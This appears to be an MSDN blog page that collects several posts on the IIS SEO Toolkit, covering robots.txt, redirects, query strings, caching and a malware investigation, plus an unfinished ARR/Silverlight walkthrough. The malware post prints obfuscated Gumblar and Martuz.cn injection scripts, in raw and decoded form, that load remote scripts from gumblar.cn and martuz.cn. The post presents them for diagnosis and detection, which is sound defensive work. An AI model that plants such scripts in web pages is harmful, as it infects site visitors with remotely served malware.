Welcome to MSDN Blogs Sign in | Join | Help

A lot of sites today have the ability for users to sign in to show them some sort of personalized content, whether its a forum, a news reader, or some e-commerce application. To simplify their users life they usually want to give them the ability to log on from any page of the Site they are currently looking at. Similarly, in an effort to keep a simple navigation for users Web Sites usually generate dynamic links to have a way to go back to the page where they were before visiting the login page, something like: <a href="/login?returnUrl=/currentUrl">Sign in</a>.

If your site has a login page you should definitely consider adding it to the Robots Exclusion list since that is a good example of the things you do not want a search engine crawler to spend their time on. Remember you have a limited amount of time and you really want them to focus on what is important in your site.

Out of curiosity I searched for login.php and login.aspx and found over 14 million login pages… that is a lot of useless content in a search engine.

Another big reason is because having this kind of URL's that vary depending on each page means there will be hundreds of variations that crawlers will need to follow, like /login?returnUrl=page1.htm, /login?returnUrl=page2.htm, etc, so it basically means you just increased the work for the crawler by two-fold. And even worst, in some cases if you are not careful you can easily cause an infinite loop for them when you add the same "login-link" in the actual login page since you get /login?returnUrl=login as the link and then when you click that you get /login?returnUrl=login?returnUrl=login... and so on with an ever changing URL for each page on your site. Note that this is not hypothetical this is actually a real example from a few famous Web sites (which I will not disclose). Of course crawlers will not infinitely crawl your Web site and they are not that silly and will stop after looking at the same resource /login for a few hundred times, but this means you are just reducing the time of them looking at what really matters to your users.

IIS SEO Toolkit

If you use the IIS SEO Toolkit it will detect the condition when the same resource (like login.aspx) is being used too many times (and only varying the Query String) and will give you a violation error like: Resource is used too many times.

 

So how do I fix this?

There are a few fixes, but by far the best thing to do is just add the login page to the Robots Exclusion protocol.

  1. Add the URL to the /robots.txt, you can use the IIS Search Engine Optimization Toolkit to edit the robots file, or just drop a file with something like:
    User-agent: *
    Disallow: /login
  2. Alternatively (or additionally)  you can add a rel attribute with the nofollow value to tell them not to even try. Something like:
    <a href="/login?returnUrl=page" rel="nofollow">Log in</a>
  3. Finally make sure to use the Site Analysis feature in the IIS SEO Toolkit to make sure you don't have this kind of behavior. It will automatically flag a violation when it identifies that the same "page" (with different Query String) has already been visited over 500 times.

Summary

To summarize always add the login page to the robots exclusion protocol file, otherwise you will end up:

  1. sacrificing valuable "search engine crawling time" in your site.
  2. spending unnecessary bandwidth and server resources.
  3. potentially even blocking crawlsers from your content.
0 Comments
Filed under: , ,

The other day a friend of mine who owns a Web site asked me to look at his Web site to see if I could spot anything weird since according to his Web Hosting provider it was being flagged as malware infected by Google.

My friend (who is not technical at all) talked to his Web site designer and mentioned the problem. He downloaded the HTML pages and tried looking for anything suspicious on them, however he was not able to find anything. My friend then went back to his Hosting provider and mentioned the fact that they were not able to find anything problematic and that if it could be something with the server configuration, to which they replied in a sarcastic way that it was probably ignorance on his Web site designer.

Enter IIS SEO Toolkit

So of course I decided the first thing I would do is to start by crawling the Web site using Site Analysis in IIS SEO Toolkit. This gave me a list of the pages and resources that his Web site would have. First thing I knew is usually malware hides either in executables or scripts on the server, so I started looking for the different content types shown in the "Content Types Summary" inside the Content reports in the dashboard page.

img01

I was surprised to no found a single executable and to only see two very simple javascripts which looked not like malware in any way. So based on previous knowledge I knew that malware in HTML pages usually is hidden behind a funky looking script that is encoded and usually uses the eval function to run the code. So I quickly did a query for those HTML pages which contain the word eval and contain the word unescape. I know there are valid scripts that could include those features since they exist for a reason but it was a good way to get scoping the pages.

Gumblar and Martuz.cn Malware on sight

img02

After running the query as shown above, I got a set of HTML files which all gave a status code 404 – NOT FOUND. Double clicking in any of them and looking at the HTML markup content made it immediately obvious they were malware infected, look at the following markup:

<HTML>
<HEAD>
<TITLE>404 Not Found</TITLE>
</HEAD>
<script language=javascript><!-- 
(function(AO9h){var x752='%';var qAxG='va"72"20a"3d"22Scr"69pt"45ng"69ne"22"2cb"3d"22Version("29"2b"22"2c"6a"3d"22"22"2cu"3dnav"69g"61"74or"2e"75ser"41gent"3bif((u"2e"69ndexO"66"28"22Win"22)"3e0)"26"26(u"2eindexOf("22NT"206"22"29"3c0)"26"26(document"2e"63o"6fkie"2ei"6e"64exOf("22mi"65"6b"3d1"22)"3c0)"26"26"28typ"65"6ff"28"7arv"7a"74"73"29"21"3dty"70e"6f"66"28"22A"22))"29"7b"7arvzts"3d"22A"22"3be"76a"6c("22i"66(wi"6edow"2e"22+a"2b"22)j"3d"6a+"22+a+"22Major"22+b+a"2b"22M"69no"72"22"2bb+a+"22"42"75"69ld"22+b+"22"6a"3b"22)"3bdocume"6e"74"2ewrite"28"22"3cs"63"72ipt"20"73rc"3d"2f"2fgum"62la"72"2ecn"2f"72ss"2f"3fid"3d"22+j+"22"3e"3c"5c"2fsc"72ipt"3e"22)"3b"7d';var Fda=unescape(qAxG.replace(AO9h,x752));eval(Fda)})(/"/g);
-->
</script><script language=javascript><!-- 
(function(rSf93){var SKrkj='%';var METKG=unescape(('var~20~61~3d~22S~63~72i~70~74Engine~22~2cb~3d~22Version()+~22~2cj~3d~22~22~2c~75~3dn~61v~69ga~74o~72~2e~75se~72Agen~74~3b~69f(~28u~2eind~65~78~4ff(~22Chro~6d~65~22~29~3c~30)~26~26(~75~2e~69ndexOf(~22Wi~6e~22)~3e0)~26~26(u~2e~69ndexOf(~22~4eT~206~22~29~3c0~29~26~26(doc~75~6dent~2ecook~69e~2ein~64exOf(~22miek~3d1~22)~3c~30)~26~26~28typeof(zrv~7at~73)~21~3dtyp~65~6ff(~22A~22~29))~7bzrv~7at~73~3d~22~41~22~3b~65~76al(~22i~66(w~69ndow~2e~22+a+~22)~6a~3dj+~22+~61+~22M~61jor~22+b~2b~61+~22~4dinor~22+~62+a~2b~22B~75ild~22~2bb+~22j~3b~22)~3bdocu~6d~65n~74~2e~77rit~65(~22~3cs~63r~69pt~20src~3d~2f~2f~6dar~22~2b~22tuz~2ec~6e~2f~76~69d~2f~3f~69d~3d~22+j+~22~3e~3c~5c~2fscr~69pt~3e~22)~3b~7d').replace(rSf93,SKrkj));eval(METKG)})(/\~/g);
 
--></script><BODY>
<H1>Not Found</H1>
The requested document was not found on this server.
<P>
<HR>
<ADDRESS>
Web Server at **********
</ADDRESS>
</BODY>
</HTML>

Notice those two ugly scripts that seem to be just a random set of numbers, quotes and letters? I do not believe I've ever met a developer that writes code like that in real web applications.

For those of you like me that do not particularly enjoy reading encoded Javascript what these two scripts do is just unescape the funky looking string and then execute it. I have un-encoded the script that would get executed and showed it below just to show case how this malware works. Note how they special case a couple browsers including Chrome to request then a particular script that will cause the real damage.

var a = "ScriptEngine", 
   
b = "Version()+", 
   
j = "", 
   
u = navigator.userAgent; 
if ((u.indexOf("Win") > 0) && (u.indexOf("NT 6") < 0) && (document.cookie.indexOf("miek=1") < 0) && (typeof (zrvzts) != typeof ("A"))) { 
   
zrvzts = "A"; 
   
eval("if(window." + a + ")j=j+" + a + "Major" + b + a + "Minor" + b + a + "Build" + b + "j;"); 
   
document.write("<script src=//gumblar.cn/rss/?id=" + j + "><\/script>"); 
}

And:

var a="ScriptEngine",
   
b="Version()+",
   
j="",u=navigator.userAgent;
if((u.indexOf("Chrome")<0)&&(u.indexOf("Win")>0)&&(u.indexOf("NT 6")<0)&&(document.cookie.indexOf("miek=1")<0)&&(typeof(zrvzts)!=typeof("A"))){
   
zrvzts="A";
   
eval("if(window."+a+")j=j+"+a+"Major"+b+a+"Minor"+b+a+"Build"+b+"j;");document.write("<script src=//martuz.cn/vid/?id="+j+"><\/script>");
}

Notice how both of them end up writing the actual malware script living in martuz.cn and gumblar.cn.

Final data

Now, this clearly means they are infected with malware, and it clearly seems that the problem is not in the Web Application but the infection is in the Error Pages that are being served from the Server when an error happens. Next step to be able to guide them with more specifics I needed to determine the Web server that they were using, to do that it is as easy as just inspecting the headers in the IIS SEO Toolkit which displayed something like the ones shown below:

Accept-Ranges: bytes
Content-Length: 2570
Content-Type: text/html
Date: Sat, 20 Jun 2009 01:16:23 GMT
Last-Modified: Sun, 17 May 2009 06:43:38 GMT
Server: Apache/2.2.3 (Debian) mod_jk/1.2.18 PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8

With a big disclaimer that I know nothing about Apache, I then guided them to their .htaccess file and the httpd.conf file for ErrorDocument and that would show them which files were infected and if it was a problem in their application or the server.

Case Closed

Turns out that after they went back to their Hoster with all this evidence, they finally realized that their server was infected and were able to clean up the malware. IIS SEO Toolkit helped me quickly identify this based on the fact that is able to see the Web site with the same eyes as a Search Engine would, following every link and letting me perform easy queries to find information about it. In future versions of IIS SEO Toolkit you can expect to be able to find this kind of things in a lot simpler ways, but for Beta 1 for those who cares here is the query that you can save in an XML file and use "Open Query" to see if you are infected with these malware.

<?xml version="1.0" encoding="utf-8"?>
<query dataSource="urls">
 
<filter>
   
<expression field="ContentTypeNormalized" operator="Equals" value="text/html" />
    <
expression field="FileContents" operator="Contains" value="unescape" />
    <
expression field="FileContents" operator="Contains" value="eval" />
  </
filter>
 
<displayFields>
   
<field name="URL" />
    <
field name="StatusCode" />
    <
field name="Title" />
    <
field name="Description" />
  </
displayFields>
</query>

The other day somebody ask me if there was a way to limit the amount of work that Site Analysis in IIS SEO Toolkit would cause to the server. This is interesting for a couple of reasons,

  • You might want to reduce the load that Site Analysis cause to your server at any given time
  • You might have a Denial-of-service detection system such as our Dynamic IP Restrictions IIS module that will start failing requests based on number of requests in a certain amount of time
  • Or If you like me have to go through a Proxy and it has a configured limit of number of requests per minute you are allowed to issue

In Beta 1 we do not support the Crawl-delay directive in the Robots exclusion protocol; in future versions we will look at adding support this setting. The good news is that in Beta 1 we do have a configurable setting that can help you achieve this goals called Maximum Number of Concurrent Requests that you can configure.

To set it:

  1. Go to the Site Analysis Reports page
  2. Select the option "Edit Feature Settings..." as show in the next image
    EditFeatureSettings
  3. In the "Edit Feature Settings" dialog you will see the Maximum Number of Concurrent Requests option that you can set to any value from 1 to 16. The default value is 8 which means at any given time we will issue 8 requests to the server.
    MaxConcurrentRequests
2 Comments
Filed under: , ,

In the URL Rewrite forum somebody posted the question "are redirects bad for search engine optimization?". The answer is: not necessarily, Redirects are an important tool for Web sites and if used in the right context they actually are a required tool. But first a bit of background.

What is a Redirect?

A redirect in simple terms is a way for the server to indicate to a client (typically a browser) that a resource has moved and they do this by the use of an HTTP status code and a HTTP location header. There are different types of redirects but the most common ones used are:

  • 301 - Moved Permanently. This type of redirect signals that the resource has permanently moved and that any further attempts to access it should be directed to the location specified in the header
  • 302 - Redirect or Found. This type of redirect signals that the resource is temporarily located in a different location, but any further attempts to access the resource should still go to the same original location.

Below is an example on the response sent from the server when requesting http://www.microsoft.com/SQL/

HTTP/1.1 302 Found
Connection: Keep-Alive
Content-Length: 161
Content-Type: text/html; charset=utf-8
Date: Wed, 10 Jun 2009 17:04:09 GMT
Location: /sqlserver/2008/en/us/default.aspx
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET

 

So what do redirects mean for SEO?

One of the most important factors in SEO is the concept called organic linking, in simple words it means that your page gets extra points for every link that external Web sites have linking to your page. So now imagine the Search Engine Bot is crawling an external Web site and finds a link pointing to your page (example.com/some-page) and when it tries to visit your page it runs into a redirect to another location (say example.com/somepage). Now the Search Engine has to decide if it should add the original "some-page" into its index as well as if it should "add the extra points" to the new location or to the original location, or if it should just ignore it entirely. Well the answer is not that simple, but a simplification of it could be:

  • if you return a 301 (Permanent Redirect) you are telling the search engine that the resource moved to a new location permanently so that all further traffic should be directed to that location. This clearly means that the search engine should ignore the original location (some-page) and index the new location (somepage), and that it should add all the "extra points" to it, as well as any further references to the original location should now be "treated" as if it was the new one.
  • if you return a 302 (Temporary Redirect) the answer can depend on search engines, but its likely to decide to index the original location and ignore the new location at all (unless directly linked in other places) since its only temporary and it could at any given point stop redirecting and start serving the content from the original location. This of course makes it very ambiguous on how to deal with the "extra points" and likely will be added to the original location and not the new destination.

 

Enter IIS SEO Toolkit

IIS Search Optimization Toolkit has a couple of rules that look for different patterns related to Redirects. The Beta version includes the following:

  1. The redirection did not include a location header. Believe it or not there are a couple of applications out there that does not generate a location header which completely breaks the model of redirection. So if your application is one of them, it will let you know.
  2. The redirection response results in another redirection. In this case it detected that your page (A) is linking to another page (B) which caused a redirection to another page (C) which resulted in another redirection to yet another page (D). In this case it is trying to let you know that the number of redirects could significantly impact the SEO "bonus points" since the organic linking could be all broken by this jumping around and that you should consider just linking from (A) to (D) or whatever actual end page is supposed to be the final destination.
  3. The page contains unnecessary redirects. In this case it detected that your page (A) is linking to another page (B) in your Web site that resulted in a redirect to another page (C) within your Web site. Note that this is an informational rule, since there are valid scenarios where you would want this behavior, such as when tracking page impressions, or login pages, etc. but in many cases you do not need them since we detect that you own the three pages we are suggesting to look and see if it wouldn't be better to just change the markup in (A) to point directly to (C) and avoid the (B) redirection entirely.
  4. The page uses a refresh definition instead of using redirection. Finally related to redirection, IIS SEO will flag when it detects that the use of the refresh meta-tag is being used as a mean for causing a redirection. This is a practice that is not recommended since the use of this tag does not include any semantics for search engines on how to process the content and in many cases is actually consider to be a tactic to confuse search engines, but I won't go there.

So how does it look like? In the image below I ran Site Analysis against a Web site and it found a few of these violations (2 and 3).

IISSEORedirect1

Notice that when you double click the violations it will tell you the details as well as give you direct access to the related URL's so that you can look at the content and all the relevant information about them to make the decision. From that menu you can also look at which other pages are linking to the different pages involved as well as launch it in the browser if needed.

IISSEORedirect2

Similarly with all the other violations it tries to explain the reason it is being flagged as well as recommended actions to follow for each of them.

IIS Search Engine Optimization Toolkit can also help you find all the different types of redirects and the locations where they are being used in a very easy way, just select Content->Status Code Summary in the Dashboard view and you will see all the different HTTP Status codes received from your Web site. Notice in the image below how you can see the number of redirects (in this case 18 temporary redirects and 2 permanent redirects). You can also see how much content they accounted for, in this case about 2.5 kb (Note that I've seen Web sites generate a large amount of useless content in redirect traffic, speaking of spending in bandwidth). You can double click any of those rows and it will show you the details of the URL's that returned that and from there you can see who links to them, etc.

IISSEORedirect3

So what should I do?

  1. Know your Web site. Run Site Analysis against your Web site and see all the different redirects that are happening.
  2. Try to minimize redirections. If possible with the knowledge gain on 1, make sure to look for places where you can update your content to reduce the number of redirects.
  3. Use the right redirect. Understand what is the intent of the redirection you are trying to do and make sure you are using the right semantics (is it permanent or temporary). Whenever possible prefer Permanent Redirects 301.
  4. Use URL Rewrite to easily configure them. URL Rewrite allows you to configure a set of rules using both regular expressions and wildcards that live along with your application (no-administrative privileges required) that can let you set the right redirection status code. A must for SEO. More on this on a future blog.

Summary

So going back to the original question: "are redirects bad for Search Engine Optimization?". Not necessarily, they are an important tool used by Web application for many reasons such as:

  • Canonicalization. Ensure that users are accessing your site with www. or without www. use permanent redirects
  • Page impressions and analytics. Using temporary redirects to ensure that the original link is preserved and counters work as expected.
  • Content reorganization. Whether you are changing your host due to a brand change or just renaming a page, you should make sure to use permanent redirects to keep your page rankings.
  • etc

Just make sure you don't abuse them by having redirects to redirects, unnecessary redirects, infinite loops, and use the right semantics.

1 Comments
Filed under: , ,

Today somebody was running the IIS SEO Toolkit and using the Site Analysis feature flagged a lot of violations about "The page contains multiple canonical formats.". The reason apparently is that he uses Query String parameters to pass contextual information or other information between pages. This of course yield the question: Does that mean in general query strings are bad news SEO wise?

Well, the answer is not necessarily.

I will start by clarifying that this violation in Site Analysis means that our algorithm detected that those two URL's look like the same content, note that we make no assumptions based on the URL (including Query String parameters). This kind of situation is bad for a couple of reasons:

  1. Based on the fact they look like the same page Search Engines will probably choose one of them and index it as the real content and will discard the other one. The problem is that you are leaving this decision to Search Engines which means some might choose the wrong version and end up using the one with Query String parameters instead of the clean one (not-likely though). Or even worse they might end up indexing both of them as if they were different.
  2. When other Web sites look at your content and add links to it, some of them might end up using the URL with different Query String parameters and some of them not. What this means is that the organic linking will not give you the benefits that you would if this was not the case. Remember Search Engines add you "extra" points when somebody external references your page but now you'll be splitting the earnings with "two pages" instead of a single canonical form.

Query String by themselves do not pose a terrible threat to SEO, most modern Search Engines deal OK with Query Strings, however its the organic linking and the potential abuse of Query Strings that could give you headaches.

Remember, Search Engines should make no assumptions based on the fact it is a single "page" that serves tons of content through a single Absulte Path and the use of Query Strings. This is typical in many cases such as when using index.php, where pretty much every page on the site is served by the same resource and just using variations of Query Strings or path information.

 

So what should I do?

Well, there are several things you could do, but probably one of the easiest is to just tell Search Engines (more specifically crawlers or bots) to not index pages that have the different Query String variations that really are meant only for the application to pass state and not to specify different content. This can be done using the Robots Exclusion Protocol and use the wildcard matching to specify to not follow any URL's that contain a '?'. Note that you should make sure you are not blocking URL's that actually are supposed to be indexed. For this you can use the Site Analysis feature to run it again and it will flag an informational message for each URL that is not visited due to the robots exclusion file.

User-agent: *
Disallow: /*?

 

In summary, try to keep canonical formats yourself, don't leave any guesses to Search Engines cause some of them might get it wrong. There are new ways of specifying the canonical form in your markup but it is "very recent" (as in 2009) and some Search Engines do not support it (I believe the top three do, though) using the new rel="canonical":

<link rel="canonical" href="http://www.my-site.com/my-canonical-url" />

In the Beta 2 version of IIS SEO Toolkit we will support this tag and have better detection of this canonical issues. So stay tuned.

Other ways to solve this is to use URL Rewrite so that you can easily redirect or rewrite your URL's to get rid of the Query Strings and use more SEO friendly URL's.

3 Comments
Filed under: , ,

One easy way to enhance the experience of users visiting your Web site by increasing the perceived performance of navigating in your site is to reduce the number of HTTP requests that are required to display a page. There are several techniques for achieving this, such as merging scripts into a single file, merging images into a big image, etc, but by far the simplest one of all is making sure that you cache as much as you can in the client. This will not only increase the rendering time but will also reduce load in your server and will reduce your bandwidth consumption.

Unfortunately the different types of caches and the different ways of set it can be quite confusing and esoteric. So my recommendation is to think about one way and use that all the time, and that way is using the HTTP 1.1 Cache-Control header.

So first of all, how do I know if my application is being well behaved and sending the right headers so browsers can cache them. You can use a network monitor or tools like Fiddler or wfetch to look at all the headers and figure out if the headers are getting sent correctly. However, you will soon realize that this process won't scale for a site with hundreds if not thousands of scripts, styles and images.

Enter Site Analysis - IIS Search Optimization Toolkit

To figure out if your images are sending the right headers you can follow the next steps:

  1. Install the IIS Search Optimization Toolkit from http://www.iis.net/extensions/SEOToolkit
  2. Launch InetMgr.exe (IIS Manager) and crawl your Web Site. For more details on how to do that refer to the article "Using Site Analysis to crawl a web site".
  3. Once you are in the Site Analysis dashboard view you can start a New Query by using the Menu "Query->New Query" and add the following criteria:
    1. Is External - Equals - False -> To only include the files that are coming from your Web site.
    2. Status code - Equals - OK -> To include only successful requests
    3. Content Type Normalized - Begines With - image/ -> To include only images
    4. Headers - Not Contains - Cache-Control: -> to include the ones does not have the cache-control header specified
    5. Headers - Not Contains - Expires: -> To include only the ones that do no have the expires header
    6. Press Execute, and this will display all the images in your Web site that are not specifying any caching behavior.

Alternatively you can just save the following query as "ImagesNotCached.xml" and use the Menu "Query->Open Query" for it. This should make it easy to open the query for different Web sites or keep testing the results when making changes:

<?xml version="1.0" encoding="utf-8"?>
<query dataSource="urls">
 
<filter>
   
<expression field="IsExternal" operator="Equals" value="False" />
    <
expression field="StatusCode" operator="Equals" value="OK" />
    <
expression field="ContentTypeNormalized" operator="Begins" value="image/" />
    <
expression field="Headers" operator="NotContains" value="Cache-Control:" />
    <
expression field="Headers" operator="NotContains" value="Expires:" />
  </
filter>
 
<displayFields>
   
<field name="URL" />
    <
field name="ContentTypeNormalized" />
    <
field name="StatusCode" />
  </
displayFields>
</query>

How do I fix it?

In IIS 7 this is trivial to fix, you can just drop a web.config file in the same directory where your images and scripts and CSS styles specifying the caching behavior for them. The following web.config will send the Cache-Control header so that the browser caches the responses for up to 7 days.

<?xml version="1.0" encoding="UTF-8"?>
<configuration>
 
<system.webServer>
       
<staticContent>
           
<clientCache cacheControlMode="UseMaxAge" cacheControlMaxAge="7.00:00:00" />
        </
staticContent>
 
</system.webServer>
</configuration>

You can also do this through the UI (IIS Manager) by going into the "HTTP Response Headers" feature -> Set Common Headers... or any of our API's using Managed code, JavaScript or your favorite language:

http://www.iis.net/ConfigReference/system.webServer/staticContent/clientCache

Furthermore, using the same query above in the Query Builder you can Group by Directory and find the directories that really worth adding this. For that is just matter of clicking the "Group by" button and adding the URL-Directory to the Group by clauses. Not surprisingly in my case it flags the App_Themes directory where I store 8 images.

IIS SEO

 

Finally, what about 304's?

One thing to note is that that even if you do not do anything most modern browsers will use conditional requests to reduce the latency if they have a copy in their cache, as an example, imagine the browser needs to display logo.gif as part of displaying test.htm and that image is available in their cache, the browser will issue a request like this

GET /logo.gif HTTP/1.1
Accept: */*
Referer: http://carlosag-client/test.htm
Accept-Language: en-us
User-Agent: (whatever-browser-you-are-using)
Accept-Encoding: gzip, deflate
If-Modified-Since: Mon, 09 Jun 2008 16:58:00 GMT
If-None-Match: "01c13f951cac81:0"
Host: carlosagdev:8080
Connection: Keep-Alive

Note the use of If-Modfied-Since header which tells the server to only send the actual data if it has been changed after that time. In this case it hasn't so the server responds with a status code 304 (Not Modified)

HTTP/1.1 304 Not Modified
Last-Modified: Mon, 09 Jun 2008 16:58:00 GMT
Accept-Ranges: bytes
ETag: "01c13f951cac81:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sun, 07 Jun 2009 06:33:51 GMT

Even though this helps you can imagine that this still requires a whole roundtrip to the server which even though will have a short response, it can still have a significant impact if rendering of the page is waiting for it, as in the case of a CSS file that the browser needs to resolve to display correctly the page or an <img> tag that does not include the dimensions (width and height attributes) and so requires the actual image to determine the required space (one reason why you should always specify the dimensions in markup to increase rendering performance).

Summary

To summarize, with IIS Search Engine Optimization Toolkit you can easily build your own queries to learn more about your own Web site, allowing you to easily find details that otherwise were tedious tasks. In this case I show how easy it is to find all the images that are not specifying any caching headers and you can do the same thing for scripts (if you add Content Type Normalized equals application/javascript)  or styles (Content Type Normalized Equals text/css). This way you can increase the performance of the rendering and reduce the overall bandwidth of your Web site.

0 Comments
Filed under: , ,

Today we are releasing the IIS Search Engine Optimization Toolkit. The IIS SEO Toolkit is a set of features that aim to help you keep your Web site and its content in good shape for both Users and Search Engines.

The features that are included in this Beta release include:

  • Site Analysis. This feature includes a crawler that starts looking at your Web site contents, discovering links, downloading the contents and applying a set of validation rules aimed to help you easily troubleshoot common problems such as broken links, duplicate content, keyword analysis, route analysis and many more features that will help you improve the overall quality of your Web site.
  • Robots Exclusion Editor. This includes a powerful editor to author Robots Exclusion files. It can leverage the output of a Site Analysis crawl report and allow you to easily add the Allow and Disallow entries without having to edit a plain text file, making it less error prone and more reliable. Furthermore, you can run the Site Analysis feature again and see immediately the results of applying your robots files.
  • Sitemap and Sitemap Index Editor. Similar to the Robots editor, this allows you to author Sitemap and Sitemap Index files with the ability to discover both physical and logical (Site Analysis crawler report) view of your Site.

Checkout the great blog about IIS SEO Toolkit by ScottGu, or this IIS SEO simple video of some of its capabilities.

Run it in your Development, Staging, or Production Environments

One of the problems with many similar tools out there is that they require you to publish the updates to your production sites before you can even use the tools, and of course would never be usable for Intranet or internal applications that are not exposed to the Web. The IIS Search Engine Optimization Toolkit can be used internally in your own development or staging environments giving you the ability to clean up the content before publishing to the Web. This way your users do not need to pay the price of broken links once you publish to the Web and you will not need to wait for those tools or Search Engines to crawl your site to finally discover you broke things.

For developers this means that they can now easily look at the potential impact of removing or renaming a file, easily check which files are referring to this page and which files he can remove because of only being referenced by this page.

Run it against any Web application built on any framework running in any server

One thing that is important to clarify is that you can target and analyze your production sites if you want to, and you can target Web applications running in any platform, whether its ASP.NET, PHP, or plain HTML text files running in your local IIS or on any other remote server.

Bottom line, try it against your Web site, look at the different features and give us feedback for additional reports, options, violations, content to parse, etc, post any comments or questions at the IIS Search Engine Optimization Forum.

The IIS SEO Toolkit documentation can be found at http://learn.iis.net/page.aspx/639/using-iis-search-engine-optimization-toolkit/, but remember this is only Beta 1 so we will be adding more features and content.

IIS Search Engine Optimization Toolkit

While using IIS Manager, did you ever wondered what configuration section is this UI changing? Is there a way I could automate this using scripts or command line?

Well, if you use IIS Manager 7.0 you might have noticed that we have a link in every page called Online Help, and if you've ever clicked it you would have noticed that it takes you to the IIS 7 Operations Guide, however you might ask yourself if it was that important to place that in every page, and the answer was that we had other reasons to add it there.

Back then when we were designing the UI we realized we wanted to provide the best content we could have for each page and potentially be able to update it as more content was available, for that reason we added this link there. However, the content was not ready at the time and instead we pointed it to our operations guide.

But the good news is that we are updating those links to point to their respective entry in the Configuration Reference that was recently published. This means now that in any page in IIS Manager, if you click the Online Help we will point you to the configuration section that this UI would change which will give you details about how the section look like, ways to change it using Scripts, AppCmd, etc.

Online Help

An interesting thing, this new routing mechanism is brought to you by our very own URL Rewrite module and a simple Rewrite Map as well as a couple of rules. If you haven't looked into it, you should definitely download it and give it a try, you'll soon realize that there are so many things you can do without writing any code that you'll love it.

0 Comments
Filed under: ,

During this PDC I attended Ian's presentation about WPF and Silverlight where he demonstrated the high degree of compatibility that can be achieved between a WPF desktop application and a Silverlight application. One of the differences that he demonstrated was when your application consumed Web Services since Silverlight applications execute in a sandboxed environment they are not allowed to call random Web Services or issue HTTP requests to servers that are not the originating server, or a server that exposes a cross-domain manifest stating that it is allowed to be called by clients from that domain.

Then he moved to show how you can work around this architectural difference by writing your own Web Service or HTTP end-point that basically gets the request from the client and using code on the server just calls the real Web Service. This way the client sees only the originating server and it allows the call to succeed, and the server can freely call the real Web Service. Funny enough while searching for a Quote Service I ran into an article from Dino Esposito in MSDN magazine  where he explains the same issue and also exposes a "Compatibility Layer" which again is just code (more than 40 lines of code) to act as proxy to call a Web Service (except he uses the JSON serializer to return the values).

The obvious disadvantage is that this means you have to write code that only forwards the request and returns the response acting essentially as a proxy. Of course this can be very simple, but if the Web Service you are trying to call has any degree of complexity where custom types are being sent around, or if you actually need to consume several methods exposed by it, then it quickly becomes a big maintenance nightmare trying to keep them in sync when they change and having to do error handling properly, as well as dealing with differences when reporting network issues, soap exceptions, http exceptions, etc.

So after looking at this, I immediately thought about ARR (Application Request Routing) which is a new extension for IIS 7.0 (see http://www.iis.net/extensions) that you can download for free from IIS.NET for Windows 2008, that among many other things is capable of doing this kind of routing without writing a single line of code.

This blog tries to show how easy it is to implement this using ARR. Here are the steps to try this: (below you can find the software required), note that if you are only interested in what is really new just go to 'Enter ARR' section below to see the configuration that fix the Web Service call.

  1. Create a new Silverlight Project (linked to an IIS Web Site)
    1. Launch Visual Web Developer from the Start Menu
    2. File->Open Web Site->Local IIS->Default Web Site. Click Open
    3. File->Add->New Project->Visual C#->Silverlight->Silverlight Application
    4. Name:SampleClient, Locaiton:c:\Demo,  Click OK
    5. On the "Add Silverlight Application" dialog choose the "Link this Silverlight control into an existing Web site", and choose the Web site in the combo box.
    6. This will add a SampleClientTestPage.html to your Web site which we will run to test the application.
  2. Find a Web Service to consume
    1. In my case I searched using http://live.com for a Stock Quote Service which I found one at http://www.webservicex.net/stockquote.asmx
  3. Back at our Silverlight project, add a Service Reference to the WSDL
    1. Select the SampleClient project in the Solution Explorer window
    2. Project->Add Service Reference and type http://www.webservicex.net/stockquote.asmx in the Address and click Go
    3. Specify a friendly Namespace, in this case StockQuoteService
    4. Click OK
  4. Add a simple UI to call the Service
    1. In the Page.xaml editor type the following code inside the <UserControl></UserControl> tags:
    2.     <Grid x:Name="LayoutRoot" Background="Azure">
             
      <Grid.RowDefinitions>
                 
      <RowDefinition Height="30" />
                  <
      RowDefinition Height="*" />
              </
      Grid.RowDefinitions>
             
      <Grid.ColumnDefinitions>
                 
      <ColumnDefinition Width="50" />
                  <
      ColumnDefinition Width="*" />
                  <
      ColumnDefinition Width="50" />
              </
      Grid.ColumnDefinitions>
             
      <TextBlock Grid.Column="0" Grid.Row="0" Text="Symbol:" />
              <
      TextBox Grid.Column="1" Grid.Row="0" x:Name="_symbolTextBox" />
              <
      Button Grid.Column="2" Grid.Row="0" Content="Go!" Click="Button_Click" />
              <
      ListBox Grid.Column="0" Grid.Row="1" x:Name="_resultsListBox" Grid.ColumnSpan="3"
                       ItemsSource
      ="{Binding}">
                 
      <ListBox.ItemTemplate>
                     
      <DataTemplate>
                         
      <StackPanel Orientation="Horizontal">
                             
      <TextBlock Text="{Binding Path=Name}" FontWeight="Bold" Foreground="DarkBlue" />
                              <
      TextBlock Text=" = " />
                              <
      TextBlock Text="{Binding Path=Value}" />
                          </
      StackPanel>
                     
      </DataTemplate>
                 
      </ListBox.ItemTemplate>
             
      </ListBox>
         
      </Grid>
    3. Right click the Button_Click text above and select the "Navigate to Event Handler" context menu.
    4. Enter the following code to call the Web Service
    5.     private void Button_Click(object sender, RoutedEventArgs e)
         
      {
             
      var service = new StockQuoteService.StockQuoteSoapClient();
             
      service.GetQuoteCompleted += service_GetQuoteCompleted;
             
      service.GetQuoteAsync(_symbolTextBox.Text);
         
      }
    6. Now, since we are going to use XLINQ to parse the result of the Web Service which is an XML then we need to add the reference to System.Xml.Linq by using the Project->Add Reference->System.Xml.Linq.
    7. Finally, add the following function to handle the result of the Web Service
    8.     void service_GetQuoteCompleted(object sender, StockQuoteService.GetQuoteCompletedEventArgs e)
         
      {
             
      var el = System.Xml.Linq.XElement.Parse(e.Result);
             
      _resultsListBox.DataContext = el.Element("Stock").Elements();
         
      }
  5. Compile the application. Build->Build Solution.
  6. At this point we are ready to test our application, to run it just navigate to http://localhost/SampleClientTestPage.html or simply select the SampleClientTestPage.html in the Solution Explorer and click View In Browser.
  7. Enter a Stock Symbol (say MSFT) and press Go!, Verify that it breaks. You will see a small "Error in page" with a Warning icon in the status bar. If you click that and select show details you will get a dialog with the following message:
  8. Message: Unhandled Error in Silverlight 2 Application An exception occurred during the operation, making the result invalid. 

Enter Application Request Routing and IIS 7.0

  1. Ok, so now we are running into the cross-domain issue, and unfortunately we don't have a cross-domain here is where ARR can help us call the service without writing more code
  2. Modify the Web Service configuration to call a local Web Service instead
    1. Back in Visual Web Developer, open the file ServiceReferences.ClientConfig
